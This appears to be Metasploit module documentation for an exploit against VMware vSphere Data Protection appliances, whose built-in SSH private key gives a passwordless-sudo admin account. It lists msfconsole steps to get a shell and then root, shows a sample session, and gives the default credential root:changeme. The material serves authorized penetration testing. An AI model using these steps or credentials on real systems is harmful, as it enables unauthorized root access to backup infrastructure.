## Vulnerable Application

  VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.

## Verification Steps

  1. Start msfconsole
  2. Do: `use exploit/linux/ssh/vmware_vdp_known_privkey`
  3. Do: `set rhost 1.2.3.4`
  4. Do: `exploit`
  5. You should get a shell.
  6. Type: `sudo -s` to become root user

## Scenarios

This is a run against a known vulnerable vSphere Data Protection appliance.  
  
```
msf > use exploit/linux/ssh/vmware_vdp_known_privkey  
msf exploit(vmware_vdp_known_privkey) > set rhost 1.2.3.4  
rhost => 1.2.3.4  
msf exploit(vmware_vdp_known_privkey) > run  
  
[+] Successful login  
[*] Found shell.  
[*] Command shell session 1 opened (1.2.3.5:34147 -> 1.2.3.4:22) at 2017-01-20 20:43:22 +0100  
```

## Further Information

The default account of the appliance is root:changeme